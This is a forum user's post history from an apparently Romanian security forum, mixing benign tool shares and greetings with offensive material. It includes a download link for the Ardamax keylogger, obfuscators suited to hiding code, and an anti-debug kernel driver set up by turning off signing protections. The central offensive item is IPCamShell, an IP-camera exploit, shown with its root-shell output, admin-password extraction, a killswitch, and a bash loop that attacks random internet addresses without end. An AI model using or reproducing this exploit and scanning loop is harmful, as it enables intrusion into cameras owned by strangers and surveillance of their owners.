
rukov
Active Members-
Posts
1123 -
Joined
-
Last visited
-
Days Won
16
Everything posted by rukov
-
Wandora is a tool for people who collect and process information, especially networked knowledge and knowledge about WWW resources. Our goal is to provide an easy way to aggregate and combine information from various different sources and to allow the user to play with and manipulate the collected knowledge flexible and efficiently, and without programming skills. Wandora is not only a graph database but a collection of easy-to-use tools to collect, manipulate and publish the information. Wandora is a desktop application, written in Java, and runs in Windows, Linux and Mac OS X computers. Wandora has graphical user interface and offers several topic map visualization models. You can view the topic map using a topic map browser, graph and treemap visualizations, or you can program your own visualization with embedded Processing language. Even more visualizations is available with the embedded HTML browser. Several visualization windows can be viewed simultaneusly. Next image views Wandora with three topic panels. Middle visualization is created using a Processing script, upper-right is Wandora's default graph visualization and lower-right is default topic browser. The Wandora application requires Java Runtime Environment (JRE) or Java Development Kit (JDK) version 7. Neither JRE nor JDK is included in the distribution packages. Youtube Tutorials https://www.youtube.com/channel/UClJoFDmiThA02RmAUT5YEcw Download http://www.wandora.org/download/wandora.zip
-
La multi ani! Multa sanatate si fericire iti doresc.
-
cheap vps
-
Domeniu .science gratis 1 an Register Science - get your FREE .science domain name here va expira destul de rapid.Folositi cuponul ForScience la checkout.
-
Zippyshare.com Ardamax 4.3.7
-
La multi aniii! Sanatate si fericire alaturi de cei dragi.
-
Requirements PHP 5 A distribution of Linux. I haven’t and won’t test this on Windows. IP Cam Shell Usage Using IPCS is pretty straight forward. You pass the URL to ipcs.php via the -u option. $ php ipcs.php -u http://192.168.0.3:8080 If the camera is vulnerable you’ll be dropped in to a “shell” as root and be able to exploit the camera further. $ php ipcs.php -u http://192.168.0.3:8080 Those who do not understand UNIX are condemned to reinvent it, poorly. — Henry Spencer ipcamshell> It’s very much like being logged in to a stripped down Unix server as root. ipcamshell> whoami root ipcamshell> id uid=0(root) gid=0(root) ipcamshell> ls / bin dev etc lib linuxrc mnt opt proc sbin scripts tmp usr var ipcamshell> cat /etc/passwd root:x:0:0:Linux User,,,:/:/bin/sh Use quit, exit, or ^C to exit. Further Attacks Of course it wouldn’t be very fun without the ability to login and view the camera… ipcamshell> getadminpass Username: admin Password: hunter2 If you wish to kill the web server (to prevent someone from accessing the web interface temporarily), run the killswitch command. Note that the camera will continue to record regardless of this. Shutting the server down might switch the camera off, although that’s complete speculation. If the camera isn’t vulnerable, the server isn’t up, or the internet hates you, you’ll recieve the following message: Sorry, the server specified isn't vulnerable. Automation IPCS has the potential to be automated in different ways. This, I’m going to leave to you. The -coption won’t drop you in to a shell after successfully exploiting a server, and the -g option surpresses the “Sorry, the server specified isn’t vulnerable.” messages for failed attempts. As an example, the following bash script will forever try to attack randomly generated IPv4 addresses. #!/bin/bash while true; do export ip=$((RANDOM%256)).$((RANDOM%256)).$((RANDOM%256)).$((RANDOM%256)) && echo "Trying $ip..." && php ipcs.php -c 1 -g 1 -u http://$ip; done; This is slow, and will likely yield nothing without extremely good luck. Use your imagination. Download https://github.com/SintheticLabs/ipcamshell
-
- camera
- ipcamshell
-
(and 3 more)
Tagged with:
-
Update la v1.2.0 Download WOLFTRAFFIC[FULL] v1.2.rar - Send Files Online - TempSend.com
-
Un ghid cum sa poti preveni infectarea cu Cryptolocker. Download http://www.thirdtier.net/downloads/CryptolockerPreventionKit.zip
-
- cryptolocker
- download
-
(and 3 more)
Tagged with:
-
With this utility you can compare two PE-module files (exe,dll,...). Pediff.dll uses levenshtein distance algorithm to find identical and/or similar functions in two binaries. There's an option to import .map file for first binary and remap it correctly to second module. External text differ application can be easily integrated. Archive includes c++ source code - class which allows you to write your own . Download: Zippyshare.com
-
- application
- easily
-
(and 3 more)
Tagged with:
-
Overview TitanHide is a driver intended to hide debuggers from certain processes. The driver hooks various Nt* kernel functions (using SSDT table hooks) and modifies the return values of the original functions. To hide a process, you must pass a simple structure with a ProcessID and the hiding option(s) to enable, to the driver. The internal API is designed to add hooks with little effort, which means adding features is really easy. Features ProcessDebugFlags (NtQueryInformationProcess) ProcessDebugPort (NtQueryInformationProcess) ProcessDebugObjectHandle (NtQueryInformationProcess) DebugObject (NtQueryObject) SystemKernelDebuggerInformation (NtQuerySystemInformation) NtClose (STATUS_INVALID_HANDLE exception) ThreadHideFromDebugger (NtSetInformationThread) Protect DRx (HW BPs) (NtSetContextThread) Test environments Windows 7 x64 & x86 (SP1) Windows XP x86 (SP3) Windows XP x64 (SP1) Compiling Install Visual Studio 2013 (Express Edition untested). Install the WDK. Open TitanHide.sln and hit compile! Installation Method 1 Copy TitanHide.sys to %systemroot%\system32\drivers. Start ServiceManager.exe (available on the download page). Delete the old service (when present). Install a new service (specify the full path to TitanHide.sys). Start the service you just created. Use TitanHideGUI.exe to set hide options for a PID. Installation Method 2 Copy TitanHide.sys to %systemroot%\system32\drivers. Run the command sc create TitanHide binPath=%systemroot%\system32\drivers\TitanHide.sys type=kernel to create the TitanHide service. Run the command sc start TitanHide to start the TitanHide service. Run the command sc query TitanHide to check if TitanHide is running. Testsigning & PatchGuard A simple way to 'bypass' PatchGuard on x64 systems is by enabling a local kernel debugger. This can be done by executing the following commands in an Administrator Console: bcdedit /set testsigning on bcdedit /debug on bcdedit /dbgsettings local /noumex In addition to the commands above you need to set BreakOnSysRq if you want to use the PrntScr button. Read this article for more information. You can also import BreakOnSysRq.reg to automatically fix this problem. Remarks When using x64_dbg, you can use the TitanHide plugin (available on the download page). When using EsetNod32 AV, disable "Realtime File Protection", to prevent a BSOD when starting TitanHide. You can re-enable it right afterwards Download https://bitbucket.org/mrexodia/titanhide/downloads
-
- ntqueryinformationprocess
- run
-
(and 3 more)
Tagged with:
-
AntiBruteRDP is a simple tool to block bruteforce attempts on your Windows Servers running RDP. Most people will say that, why have it running in the first place? Well, there are times that you will need to have Remote Desktop service available. Tested on Windows Server 2003, Windows Server 2008, and Windows 8, it works flawlessly to block the bruteforce attempts. Please take note that auditing of failed logons are enabled on windows servers by default. If you are running client version eg. Windows 7 or Windows 8, you need to change the Audit Policy for logon attempts using Group Policy Editor (gpedit.msc). For more information, you can refer to technet here Audit logon events: Security Configuration Editor; Security Services It works by monitoring failed attempts by remote addresses and block the attempts. You can configure the settings using the AntiBruteRDP Front End. Download Zippyshare.com
- 1 reply
-
- antibruterdp
- attempts
-
(and 3 more)
Tagged with:
-
-
Poate pentru cineva ii va fi util pe mine ma ajutat odata
- 2 replies
-
- bios
- http://bios-pw.org
-
(and 3 more)
Tagged with:
-
Free BIOS Master Password Generator for Laptops
- 2 replies
-
- bios
- http://bios-pw.org
-
(and 3 more)
Tagged with:
-
@ICEBREAKER101010 ehh Am luat deja decizia baieti o sa revin pe forum doar ca simplu vizitator.
-
Sunt scurt si la obiect ca de obicei ca nu vreau sa plictisesc pe nimeni aici.A venit si momentul acesta cand trebuie sa ma retrag de forumul meu preferat.Nu sunt un om de baza sau important aici asa ca nu o sa planga nimeni dupa mine.Am invatat lucruri utile de la oameni care au un mod de gandire diferit.Aveti grija de voi.Rog un moderator sa imi retraga statutul de VIP care apropo baieti nu se cere ci se castiga. Motivul retrageri mele este unul personal.
-
This utility allows you to encrypt and rename 'Strings type' into a VBNET (*.vbproj) project. The program will generate functions throughout your loaded project. Features French UI language only Displays the project's files (not ".designer." files !) Displays source code with syntax highlighting Displays the found String occurences with their line numbers Selecting encryption method (Base64, Xor, and Both) with Ascii string conversion. Displays a progress windows when loading and searching the String type occurences throughout the selected file. Prerequisites Compatible VbNet projects developped with VS2010 or VS2012 EDI All Windows OS DotNet Framework 4.0 Doesn't require installation Download Zippyshare.com
-
DNR is a open source obfuscator/Renamer which use MonoCecil library for .NET applications ! This project is based on the DotNet Patcher's renamer library You can use these 2 libraries separately without the DotNetRenamer GUI Core20Reader : a simple PE DotNet Parser/Reader The renamer based on : Core20Reader.dll, DotNetRenamer.Helper.dll, DotNetRenamer.Implementer.dll Features Doesn't support WPF .exe ! English UI language only Displays selected .exe informations (assembly name, Version, TargetRuntime, TargetCPU, SubSystemType) Selecting presets : Full, Medium, Customize Selecting encoding chars type : Alphabetic, Dots, Invisible, Chinese, Japanese Renaming : Namespaces, Types, Methods, Properties, Fields, Custom Attributes, Events, Parameters, Resources content ..... Displays number of renamed members Download Zippyshare.com
-
Happy new try year try 2015 si boom